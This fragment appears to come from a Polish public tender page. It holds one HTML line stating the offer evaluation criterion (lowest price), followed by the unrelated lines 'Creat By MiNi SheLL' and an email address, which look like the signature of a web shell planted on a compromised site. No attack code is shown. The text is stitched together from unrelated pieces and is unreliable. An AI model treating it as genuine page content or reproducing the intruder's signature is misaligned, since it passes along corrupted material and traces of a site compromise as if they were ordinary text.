<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com